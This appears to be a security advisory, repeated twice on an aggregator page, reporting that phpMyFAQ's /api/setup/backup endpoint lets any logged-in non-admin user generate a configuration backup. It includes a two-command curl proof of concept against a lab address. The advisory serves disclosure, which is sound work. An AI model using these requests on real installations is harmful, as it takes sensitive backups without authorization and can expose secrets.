Headline

GHSA-wm8h-26fv-mg7g: phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing)

Summary

Authenticated non‑admin users can call /api/setup/backup and trigger a configuration backup. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP.

Details

SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged‑in user to create a sensitive backup and retrieve its path.

PoC

Precondition: API enabled, any authenticated non‑admin user.

Log in as a non‑admin user.
Call backup endpoint.

curl -c /tmp/pmf_api_cookies.txt \
  -H 'Content-Type: application/json' \
  -d '{"username":"tester","password":"Test1234!"}' \
  http://192.168.40.16/phpmyfaq/api/v3.0/login

curl -i -b /tmp/pmf_api_cookies.txt \
  -X POST --data '4.0.16' \
  http://192.168.40.16/phpmyfaq/api/setup/backup

Impact

Low‑privileged users can generate sensitive backups. If the ZIP is web‑accessible (server misconfiguration), this can lead to secret exposure.

5 hours ago

ghsa

Open in Source

#web #js #php #auth

Summary

Authenticated non‑admin users can call /api/setup/backup and trigger a configuration backup. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP.

Details

PoC

Precondition: API enabled, any authenticated non‑admin user.

Log in as a non‑admin user.
Call backup endpoint.

curl -c /tmp/pmf_api_cookies.txt
-H ‘Content-Type: application/json’
-d ‘{"username":"tester","password":"Test1234!"}’
http://192.168.40.16/phpmyfaq/api/v3.0/login

curl -i -b /tmp/pmf_api_cookies.txt
-X POST --data ‘4.0.16’
http://192.168.40.16/phpmyfaq/api/setup/backup

Impact

Low‑privileged users can generate sensitive backups. If the ZIP is web‑accessible (server misconfiguration), this can lead to secret exposure.

References